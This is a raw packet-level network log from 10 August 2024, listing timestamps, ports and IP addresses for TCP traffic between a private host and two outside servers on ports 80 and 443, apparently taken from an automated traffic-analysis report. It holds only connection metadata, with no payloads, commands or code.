Aug 10, 2024 16:12:23.511950016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.511969090 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512006044 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.512006044 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.512006998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512120962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512140036 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512166023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512207031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512238979 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512259007 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512289047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512310028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512341022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512388945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512437105 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512459040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512506962 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512528896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512559891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512578011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512607098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512628078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512713909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512732983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512762070 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512793064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.512814045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.512867928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.513051987 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.513112068 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.513149023 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.513231039 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.513242006 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.513308048 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.513339043 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.513433933 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.513458014 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.513468981 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.513530016 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.513550997 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.513550997 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.513556957 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.513614893 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.513641119 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.513641119 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.513647079 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.513834000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.513858080 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.513864994 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.513897896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.513932943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.513951063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.513978958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.514003038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.514035940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.514055014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.514085054 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.514103889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.514139891 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.514161110 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.514193058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.520389080 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.520500898 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.520617008 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.520699024 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.520770073 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.520771027 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.520776987 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.520817995 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.520921946 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.521022081 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.521022081 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.521049976 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.521078110 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.521173000 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.521394014 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.521481991 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.521483898 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.521505117 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.521544933 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.521559000 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.521589994 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.521672964 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.521717072 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.521722078 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.521743059 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.521791935 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.549068928 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.549139023 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.549181938 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.549213886 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.549267054 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.549273968 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.549298048 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.549402952 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.549402952 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.576998949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577033997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577066898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577086926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577086926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577102900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577131033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577143908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577145100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577155113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577178001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577183008 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577193022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577197075 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577208996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577223063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577239037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577251911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577253103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577251911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577253103 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577269077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577291012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577291012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577327967 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577584982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577595949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577606916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577616930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577627897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577637911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577649117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577660084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577672005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577682972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577694893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577698946 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577698946 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577698946 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577707052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.577708960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577773094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.577773094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578011990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578022957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578032970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578043938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578054905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578088045 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578088045 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578115940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578126907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578136921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578149080 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578159094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578171015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578181028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578192949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578202009 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578202009 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578223944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578282118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578668118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578717947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578723907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578733921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578744888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578756094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578767061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578774929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578777075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578789949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578799963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578809977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578820944 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578833103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.578876019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578876019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578876019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.578876019 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579286098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579297066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579307079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579318047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579329014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579339981 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579346895 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579349995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579358101 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579360962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579372883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579382896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579396009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579407930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579420090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579428911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579438925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579438925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579438925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579438925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579471111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579817057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579828024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579840899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579852104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579869032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579879999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579880953 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579890966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579904079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579914093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579924107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579932928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579932928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579935074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579945087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579956055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579965115 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.579967022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.579997063 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580034971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580461979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580471992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580486059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580497980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580508947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580538988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580549002 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580635071 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580646038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580661058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580672026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580681086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580693007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580703974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580714941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580725908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580737114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580746889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580753088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580753088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580753088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580753088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580760956 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580771923 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580775976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580782890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.580821037 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580821037 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.580821037 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.581509113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581520081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581528902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581542015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581552982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581563950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581573009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581576109 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.581583977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581593990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581604958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581614971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581626892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581638098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581648111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.581649065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.581648111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.581649065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.581649065 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.581723928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.581723928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.596991062 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.597043037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597067118 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.597086906 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.597101927 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.597103119 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.597295046 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.597295046 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.597300053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597310066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597318888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597328901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597337961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597352028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597357035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.597366095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597376108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.597383976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597389936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.597414970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.597603083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597613096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597707033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.597907066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597918034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597925901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597943068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597951889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.597959995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597970963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597982883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.597987890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.597996950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.598011017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.598268032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598284960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598295927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598305941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598314047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.598323107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.598329067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598340034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598345995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.598355055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598366022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598371983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.598373890 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.598397017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.598416090 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.598442078 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.598468065 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.598516941 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.598531961 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.598959923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598970890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598980904 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.598992109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599001884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599009991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.599035978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.599075079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599086046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599096060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599107027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.599114895 CEST	49739	80	192.168.2.4	147.45.44.104
